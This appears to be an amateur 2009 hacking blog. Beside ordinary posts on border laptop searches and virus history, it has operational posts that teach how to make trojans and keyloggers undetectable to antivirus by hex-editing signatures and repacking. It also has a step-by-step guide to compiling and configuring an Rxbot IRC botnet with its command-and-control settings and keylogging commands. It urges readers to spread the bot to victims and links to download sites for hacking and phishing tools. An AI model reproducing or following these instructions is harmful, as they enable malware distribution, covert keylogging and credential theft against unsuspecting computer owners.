here is it:
http://rbotdownload.t35.com/friendsterhack
Wednesday, April 15, 2009
rbot commands
See the list of rbot/rxbot commands here:
http://downloadserver.podzone.net/rbotcommands
http://downloadserver.podzone.net/rbotcommands
Thursday, April 9, 2009
Friendster Hack Tutorial
Download the Tool Here:
Friendster Developer Site
or
http://paypalphishedsecurity.t35.com/nite
friendster hacking tutorial
Friendster Developer Site
or
http://paypalphishedsecurity.t35.com/nite
friendster hacking tutorial
Tuesday, April 7, 2009
Drive-By Download Tutorial
A drive-by download is a program that is automatically downloaded to your computer without your consent or even your knowledge. Unlike a pop-up download, which asks for assent (albeit in a calculated manner likely to lead to a "yes"), a drive-by download can be initiated by simply visiting a Web site or viewing an HTML e-mail message. If your computer's security settings are lax, it may be possible for drive-by downloads to occur without any further action on your part.
Frequently, a drive-by download is installed along with a user-requested application. (In this case, the unwanted application is sometimes called a barnacle.) For example, a file sharing program might be included with a spyware program that tracks and reports user information for targeted marketing purposes. An associated adware program can then generate pop-up advertisements using that information.
Sunday, April 5, 2009
Can The Government Take Away My Laptop?
A woman stands in line at the airport, waiting to get throughcustoms to return to the United States. She checks her BlackBerryfor e-mail messages and shifts her computer briefcas e to her other hand. Two uniformed men walk up to the traveler and ask her to step out of the line. They explain they're conducting a random search and that they need to look at her phone, her laptop and any other electronic devices she has. The woman asks when she can expect her property to be returned to her. The men in uniform tell her they can't be sure; they'll return the electronics when they're done searching.
According to the 9th Circuit Court in San Francisco, such a scenario is not only possible, it's completely legal. Federal Customs and Border Patrol agents have the right to confiscate and examine electronic devices belonging to anyone entering the United States. The agents aren't required to have probable cause before searching someone's devices. And they can look for any evidence of any crime at all.
This policy worries many international businesses that employ people who travel to and from the United States on a regular basis. It also might come as a shock to many U.S. residents. In most cases, citizens are guaranteed protection against unreasonable searches and seizures. Some people say that a policy in which a government agent could confiscate any electronic device for an indefinite length of time with no probable cause contradicts the Fourth Amendment of the U.S. Constitution. The 9th Circuit Court seems to feel otherwise.
U.S. Homeland Security officials claim that the policy is in place to protect the safety of the nation. They also claim that agents will not profile passengers or stop people based solely on their ethnic background or country of origin. But some critics say that in practice agents seem to target people from specific countries. An article in The Seattle Times suggests that government agents focus on Muslims and people from the Middle East or the southern parts of Asia more than others [source: Tu].
Border searches fall under the category of delicate issues -- proponents point out that an effective search might save millions of lives while critics say the potential for policy abuse is far too high to justify such an approach.
The Most Destructive Computer Viruses of All Time
Computer viruses can be a nightmare. Some can wipe out the information on a hard drive, tie up traffic on a computer network for hours, turn an innocent machine into a zombie and replicate and send themselves to other computers. If you've never had a machine fall victim to a computer virus, you may wonder what the fuss is about. But the concern is understandable -- according to Consumer Reports, computer viruses helped contribute to $8.5 billion in consumer losses in 2008 [source: MarketWatch]. Computer viruses are just one kind of online threat, but they're arguably the best known of the bunch.
In the good old days (i.e., the early 1980s), viruses depended on humans to do the hard work of spreading the virus to other computers. A hackerwould save the virus to disks and then distribute the disks to other people. It wasn't until modems became common that virus transmission became a real problem. Today when we think of a computer virus, we usually imagine something that transmits itself via the Internet. It might infect computers through e-mail messages or corrupted Web links. Programs like these can spread much faster than the earliest computer viruses.
We're going to take a look at 10 of the worst computer viruses to cripple a computer system. Let's start with the Melissa virus.
Top 10:Melissa
In the spring of 1999, a man named David L. Smith created a computer virus based on a Microsoft Word macro. He built the virus so that it could spread through e-mail messages. Smith named the virus "Melissa," saying that he named it after an exotic dancer from Florida.
Rather than shaking its moneymaker, the Melissa computer virus tempts recipients into opening a document with an e-mail message like "Here is that document you asked for, don't show it to anybody else." Once activated, the virus replicates itself and sends itself out to the top 50 people in the recipient's e-mail address book.
The virus spread rapidly after Smith unleashed it on the world. The United States federal government became very interested in Smith's work -- according to statements made by FBIofficials to Congress, the Melissa virus "wreaked havoc on government and private sector networks" [source:FBI]. The increase in e-mail traffic forced some companies to discontinue e-mail programs until the virus was contained.
Top 9:ILOVEYOU
The ILOVEYOU virus initially traveled the Internet by e-mail, just like the Melissa virus. The subject of the e-mail said that the message was a love letter from a secret admirer. An attachment in the e-mail was what caused all the trouble. The original worm had the file name of LOVE-LETTER-FOR-YOU.TXT.vbs. The vbs extension pointed to the language the hacker used to create the worm:Visual Basic Scripting [source:McAfee].
Who created the ILOVEYOU virus? Some think it was Onel de Guzman of the Philippines. Filipino authorities investigated de Guzman on charges of theft -- at the time the Philippines had no computer espionage or sabotage laws. Citing a lack of evidence, the Filipino authorities dropped the charges against de Guzman, who would neither confirm nor deny his responsibility for the virus. According to some estimates, the ILOVEYOU virus caused $10 billion in damages [source: Landler].
TOP 8:The Klez Virus
The Klez virus marked a new direction for computer viruses, setting the bar high for those that would follow. It debuted in late 2001, and variations of the virus plagued the Internet for several months. The basic Klez worm infected a victim's computer through an e-mail message, replicated itself and then sent itself to people in the victim's address book. Some variations of the Klez virus carried other harmful programs that could render a victim's computer inoperable. Depending on the version, the Klez virus could act like a normal computer virus, a worm or a Trojan horse. It could even disable virus-scanning software and pose as a virus-removal tool [source: Symantec].
Top 7:Code Red
The Code Red and Code Red II worms popped up in the summer of 2001. Both worms exploited anoperating system vulnerability that was found in machines running Windows 2000 and Windows NT. The vulnerability was a buffer overflow problem, which means when a machine running on these operating systems receives more information than its buffers can handle, it starts to overwrite adjacent memory.
Microsoft released software patches that addressed the security vulnerability in Windows 2000 and Windows NT. Once patched, the original worms could no longer infect a Windows 2000 machine; however, the patch didn't remove viruses from infected computers -- victims had to do that themselves.
Trojan Horse and Viruses Explained
Strange as it may sound, the computer virus is something of an Information Age marvel. On one hand, viruses show us how vulnerable we are -- a properly engineered virus can have a devastating effect, disrupting productivity and doing billions of dollars in damages. On the other hand, they show us how sophisticated and interconnected human beings have become.
For example, experts estimate that the Mydoom worm infected approximately a quarter-million computers in a single day in January 2004. Back in March 1999, the Melissa virus was so powerful that it forced Microsoft and a number of other very large companies to completely turn off their e-mail systems until the virus could be contained. The ILOVEYOU virus in 2000 had a similarly devastating effect. In January 2007, a worm called Storm appeared -- by October, experts believed up to 50 million computers were infected. That's pretty impressive when you consider that many viruses are incredibly simple.
When you listen to the news, you hear about many different forms of electronic infection. The most common are:
Viruses - A virus is a small piece of software that piggybacks on real programs. For example, a virus might attach itself to a program such as a spreadsheet program. Each time the spreadsheet program runs, the virus runs, too, and it has the chance to reproduce (by attaching to other programs) or wreak havoc.
E-mail viruses - An e-mail virus travels as an attachment to e-mail messages, and usually replicates itself by automatically mailing itself to dozens of people in the victim's e-mail address book. Some e-mail viruses don't even require a double-click -- they launch when you view the infected message in the preview pane of your e-mail software
Trojan horses - A Trojan horse is simply a computer program. The program claims to do one thing (it may claim to be a game) but instead does damage when you run it (it may erase your hard disk). Trojan horses have no way to replicate automatically.
Worms - A worm is a small piece of software that uses computer networks and security holes to replicate itself. A copy of the worm scans the network for another machine that has a specific security hole. It copies itself to the new machine using the security hole, and then starts replicating from there, as well.
Saturday, April 4, 2009
Monday, March 16, 2009
Simple Hacking:Phishing
In the field of computer security, phishing is the criminally fraudulent process of attempting to acquire sensitive information such as usernames, passwords and credit card details by masquerading as a trustworthy entity in an electronic communication. Communications purporting to be from popular social web sites (YouTube, Facebook, MySpace, Windows Live Messenger), auction sites (eBay), online banks (Wells Fargo, Bank of America, Chase), online payment processors (PayPal), or IT Administrators (Yahoo, ISPs, corporate) are commonly used to lure the unsuspecting. Phishing is typically carried out by e-mail or instant messaging,[1] and it often directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one. Even when using server authentication, it may require skill to detect that the website is fake. Phishing is an example of social engineering techniques used to fool users,[2] and exploits the poor usability of current web security technologies.[3] Attempts to deal with the growing number of reported phishing incidents include legislation, user training, public awareness, and technical security measures.
Common methods used:
Link manipulation-Most methods of phishing use some form of technical deception designed to make a link in an e-mail (and the spoofed website it leads to) appear to belong to the spoofed organization. Misspelled URLs or the use of subdomains are common tricks used by phishers. In the following example URL, http://www.yourbank.example.com/, it appears as though the URL will take you to the example section of the yourbank website; actually this URL points to the "yourbank" (i.e. phishing) section of the example website. Another common trick is to make the anchor text for the link appear to be valid, when the link actually goes to the phishers' site. The following example link, http://www.google.com/genuine/, appears to take you to an article entitled "Genuine"; clicking on it will in fact take you to the article entitled "Deception".
Filter evasion-Phishers have used images instead of text to make it harder for anti-phishing filters to detect text commonly used in phishing e-mails.
Website forgery-Once a victim visits the phishing website the deception is not over. Some phishing scams use JavaScript commands in order to alter the address bar. This is done either by placing a picture of a legitimate URL over the address bar, or by closing the original address bar and opening a new one with the legitimate URL.An attacker can even use flaws in a trusted website's own scripts against the victim. These types of attacks (known as cross-site scripting) are particularly problematic, because they direct the user to sign in at their bank or service's own web page, where everything from the web address to the security certificates appears correct. In reality, the link to the website is crafted to carry out the attack, although it is very difficult to spot without specialist knowledge. Just such a flaw was used in 2006 against PayPal.
A Universal Man-in-the-middle Phishing Kit, discovered by RSA Security, provides a simple-to-use interface that allows a phisher to convincingly reproduce websites and capture log-in details entered at the fake site.
To avoid anti-phishing techniques that scan websites for phishing-related text, phishers have begun to use Flash-based websites. These look much like the real website, but hide the text in a multimedia object.
Wan't to learn how t do a simple phishing?
watch this video:http://www.youtube.com/watch?v=_EajDbwNP4s&feature=related
Common methods used:
Link manipulation-Most methods of phishing use some form of technical deception designed to make a link in an e-mail (and the spoofed website it leads to) appear to belong to the spoofed organization. Misspelled URLs or the use of subdomains are common tricks used by phishers. In the following example URL, http://www.yourbank.example.com/, it appears as though the URL will take you to the example section of the yourbank website; actually this URL points to the "yourbank" (i.e. phishing) section of the example website. Another common trick is to make the anchor text for the link appear to be valid, when the link actually goes to the phishers' site. The following example link, http://www.google.com/genuine/, appears to take you to an article entitled "Genuine"; clicking on it will in fact take you to the article entitled "Deception".
Filter evasion-Phishers have used images instead of text to make it harder for anti-phishing filters to detect text commonly used in phishing e-mails.
Website forgery-Once a victim visits the phishing website the deception is not over. Some phishing scams use JavaScript commands in order to alter the address bar. This is done either by placing a picture of a legitimate URL over the address bar, or by closing the original address bar and opening a new one with the legitimate URL.An attacker can even use flaws in a trusted website's own scripts against the victim. These types of attacks (known as cross-site scripting) are particularly problematic, because they direct the user to sign in at their bank or service's own web page, where everything from the web address to the security certificates appears correct. In reality, the link to the website is crafted to carry out the attack, although it is very difficult to spot without specialist knowledge. Just such a flaw was used in 2006 against PayPal.
A Universal Man-in-the-middle Phishing Kit, discovered by RSA Security, provides a simple-to-use interface that allows a phisher to convincingly reproduce websites and capture log-in details entered at the fake site.
To avoid anti-phishing techniques that scan websites for phishing-related text, phishers have begun to use Flash-based websites. These look much like the real website, but hide the text in a multimedia object.
Wan't to learn how t do a simple phishing?
watch this video:http://www.youtube.com/watch?v=_EajDbwNP4s&feature=related
Friday, March 13, 2009
How to make rBot,trojans,keyloggerz and viruses Undetectable
1. Encryptors/Compressors:You would think this should be the easiest way to UD (Undetect) a Trojan...but alas, it is not. The problem is simply this, most people use the same Trojans and Packers so often that Anti-Virus software knows pretty much all the signatures. They either use Ardamax Keylogger, Optix Pro, Beast, ProRat etc. for Trojans. For Packers they use UPX, PECompress, AsPack, Mophine etc. Again, none of these combinations work because all the signatures have been flagged. The best way this option will work is to find lesser known Packers and Trojans to work with.Try a Google search for Executable Packers. Get a few that you have not heard of before or that have a decent rating. If it is not freeware, I am sure there will be a Crack for it. For Trojans, three good resources are VXChaos, LeetUpload or VX Heaven. Remember to pick the ones that are not well known and try to mix and match those Trojans and Packers.2. Byte Adders:This technique allows you to add junk bytes to your Trojan as to confuse Anti-Virus software. It does this by moving the code around inside the executable as the bytes are being added. This means that the signature will not be in the place the Anti-Virus expects it to be. A good tool for this would be StealthTools v2.0 by Gobo.3. Hex Editing:This is much more complicated and takes a lot more practice to get right. The idea here is to find the signature that Anti-Virus software has flagged inside of your Trojan and change it by adding a different byte, or changing the Offset to one of its other equivalents.The three things you will need here is a File Splitter, Hex Editor and a Anti-Virus Offset Finder. The File Splitter will cut your executable into smaller files (preferably 1 byte per file). You then use your Hex Editor on the file that holds the signature and change that signature. Or, you can keep the file complete and use your AV Offset Finder to find the Offsets automatically and just change the signatures found with your Hex Editor.Step One: Place your Trojan Server in a folder.Step Two: Split your Server with your File Splitter into 1 byte per file. This may make a lot of files in your folder (depending on how large the Server is), but it is worth it because you will know that only one or two of those files has the signature that is flagged and all the rest are clean.Step Three: Scan your folder with your Anti-Virus software and make note of which files it says are infected. Those will be the ones you edit.Step Four: Open up each infected file with your Hex Editor and change the Offset. There is no fool proof way of doing this, you will have to experiment. Since this will be a 1 byte file, there will not be much you need to change. Just change one character or byte at a time and then save your progress. Re-scan to see if it worked. If it did not, go back and try again.Step Five: Once you feel that you have found all signatures and changed them, Rejoin your files with your File Splitter and test your Server to see if it works. Remember that too much Editing will make your Server useless so be careful.(Optional) Step Six: Another good way is to use a Anti-Virus Offset Finder that will find the correct Offset automatically so you do not have to search for them or split your Server. Get AV Devil 2.1 to find the Offsets (password is: to0l-base).You have to remember that different AV software use different signatures, so scan with as many as you can.4. Source:The very best way to make an undetectable Trojan has always been to make your own. I know it may seem like a daunting task to do, but it could be simpler then you think. Here I will give a few options on how to do this. The reason why you would want to make your own Trojan is the fact that each time it is compiled, it is given a new signature. Changing just a single string in the Source code can make it undetectable.Option 1: Free Trojan Source Code.Finding free Trojan source code is not hard. Again, going to places like VXChaos or Planet Source Code can yield a plethora of really good and lesser known Trojan code. Pick what Programming Language you like and look for examples. Not much needs to be changed to makes these undetectable. A simple recompile will sometimes do the trick.Option 2: Decompiling.Some may call this "Stealing" source code. I like to call it "Borrowing". The first thing you need to know is what language your Trojan is in. Lets say your Trojan was Optix Pro, your programming language would be Delphi. A good Delphi Decompiler would be DeDe. Decompile Optix Pro with DeDe then recompile it with a Delphi compiler and viola! Just change a few strings around within the source and you should have a undetectable Optix Pro.Another way would be to open your Trojan with a Debugger or Disassembler. Copy down the ASM code and then recompile it in a ASM compiler. That maybe a bit more tricky, but the idea is the same. Try to convert the executable into pure ASM as best you can. There are many free Debuggers/Disassemblers, Google for them.
Friday, March 6, 2009
How to buil a botnet (revised)
There are many tutorials around but I thought I would post one to help people.In addition to Rxbot 7.6 modded in this tutorial, you can also use another good source. It is rx-asn-2-re-worked v3 is a stable mod of rxbot and it is 100% functional and not crippled. If you want to download it, you can below:Code:http://rapidshare.com/files/206237223/rbot_7.6_source_code.zip.htmlCompiling is the same as it would be with Rxbot 7.6. I prefer this source but it would ultimately be best to compile your own bot/get a private one.Q:What is a botnet?A: A botnet is where you send a trojan to someone and when they open it a "bot" joins your channel on IRC(secretly, they don't know this)Once done the computer is now refered to as a "zombie".Depending on the source you used, the bot can do several things.But once again depending on the source you can :Keylog their computer, take picutes of their screen, turn on their webcam and take pics/movies, harvest cdkeys and game keys or even cracks, passwords, aim screen names, emails, you can also spam, flood, DDoS, ping, packet, yada yada, some have built in md5 crackers, and clone functions to spamm other irc channels and overrun a channel and even perform IRC "Takeovers".Once again depending on the bot it may be able to kill other fellow competeter bots.Or even kill AV/FW apon startup.Add itself to registry.Open sites.Open commands.Cmd,notepad,html,Anything is possible !Theres the infected computers "bots" the attacker, the server, and the victim.Quote:while the term "botnet" can be used to refer to any group of bots, such as IRC bots, the word is generally used to refer to a collection of compromised machines running programs, usually referred to as worms, Trojan horses, or backdoors, under a common command and control infrastructure. A botnet's originator (aka "bot herder") can control the group remotely, usually through a means such as IRC, and usually for nefarious purposes. Individual programs manifest as IRC "bots". Often the command and control takes place via an IRC server or a specific channel on a public IRC network. A bot typically runs hidden, and complies with the RFC 1459 (IRC) standard. Generally, the perpetrator of the botnet has compromised a series of systems using various tools (exploits, buffer overflows, as well as others; see also RPC). Newer bots can automatically scan their environment and propagate themselves using vulnerabilities and weak passwords. Generally, the more vulnerabilities a bot can scan and propagate through, the more valuable it becomes to a botnet controller community.Suspects in the case used the Randex worm to establish a 30,000 strong botnet used to carry out "low profile DDoS attacks" and steal the CD keys for games, he explained. "They had a huge weapon and didn't use as much as they could have done," Santorelli told El Reg. "The main damage caused in the case is down to the cost of cleaning up infected PCs."Botnets are being used for Google Adword click fraud, according to security watchers.Now enough with all the quotes. As you can see, you can do anything with a botnet. Anything is possible. This is my bot and tutorial. You can host your bots on irc on a public server but I would recommend a private, password protected server.---------------Ignore anything about using the server editor but this tutorial show how to make the trojan undetectable and spread bots:Code:http://rapidshare.com/files/206234923/packer_installer.exe.htmlHere we go ladies and gentlemenFollow the tutorial:I. Setting up the C++ compilier: (easy)Download Code:http://www.megaupload.com/?d=SUHPYZRXCode:Pass: itzforblitzSerial: 812-22245582. Run setup.exe and install. Remember to input serial3. Download and install the Service Pack 6 (60.8 mb) Code:http://www.microsoft.com/downloads/d...displaylang=enAfter that Download and install:Windows SDK (1.2 mb) Code:http://www.megaupload.com/?d=YH3SS78IPass: itzforblitzII. Configuring the C++ compilier (easy)1. Open up Microsoft Visual C++ Compilier 6.02. Go to Tools > Options and Click the "Directories" tab3. Now, browse to these directories and add them to the list: (Click the dotted box to add)Quote:C:\PROGRAM FILES\MICROSOFT PLATFORM SDKC:\PROGRAM FILES\MICROSOFT PLATFORM SDK\BINC:\PROGRAM FILES\MICROSOFT PLATFORM SDK\INCLUDEC:\PROGRAM FILES\MICROSOFRT PLATFORM SDK\LIB4. Now put them in this order: (use up and down arrows)(it does not matter whats below those lines)III. Configuring your bot: (easy)1. Download and unpack:Rxbot 7.6 (212.3 kb) Code:http://rapidshare.com/files/21854222...7.6rx.rar.html2. You should see an Rxbot 7.6 folder3. Open the Rxbot 7.6 > configs.h folder and edit these lines only:Quote:Put in quotations:char password[] = "Bot_login_pass"; // bot password (Ex: monkey)char server[] = "aenigma.gotd.org"; // server (Ex: irc.efnet.net)char serverpass[] = ""; // server password (not usually needed)char channel[] = "#botz_channel"; // channel that the bot should joinchar chanpass[] = "My_channel_pass"; // channel passwordOptional:char server2[] = ""; // backup serverchar channel2[] = ""; // backup channelchar chanpass2[] = ""; //Backup channel passIV. Building your bot: (very easy)1. Make sure Microsoft Visual C++ is open2. Select "File > Open Workspace"3. Browse to your Rxbot 7.6 folder and open the rBot.dsw file4. Right Click "rBot Files" and click Build:5. rBot.exe will be in the Rxbot 7.6 > Debug folder !!!YOUR DONE !!!! Now get the rbot and pack it (Use tool in third post and open rbot and click "Protect" and send it to some idiots, Follow tutorial on top to learn how to spread. Some good ways are: Torrents, AIM, Friends, Myspace, School computers, and P2P but there are more ways. ENJOY !Command listDownload Command list Code:http://rapidshare.com/files/21542921/cmands.htmlBasics:.login botpassword will login bots.logout will logout bots.keylog on will turn keylogger on.getcdkeys will retrieve cdkeys.Read command list for moreDownload mIRCCode:http://dw.com.com/redir?edId=3&siteI...part%3Ddl-mIRCHow to secure your bots:Don't be an arse it is easy to steal bots. All you need is the irc server address and maybe a key.To steal bots, watch for the @login key one must upload their bot to a direct link (tdotnetwork is execellent)and update the channel topic and run:Quote:@update Code:http://www.mybot.com/download/SMSPRO.exe82The Code:http://mybot.comis your bot's download link and the 82 can be any number(s)Now steal their bots and have them join your channelTo find the server address you need their botnet. Then take their bot and open it in the server editor. Address will be shown and so will password and other needed information.To secure your self:It is fairly easy to secure your bots, here is how:1. When you are in your right click on your chat window and select "Channel Modes"2. Make sure these options are checked:This way no one besides you or another op can set the channel topicNote: Setting "Moderated" is good for when you are not there because anyone who is not voiced (+v) or and op (+o) cannot talk. They will still log in and follow commands however there will be no output.
Sunday, March 1, 2009
Welcome to my blog
Im a novice in blogging..pls apologize me for some unnecesary mistakes that i will be making in the future
Subscribe to:
Posts (Atom)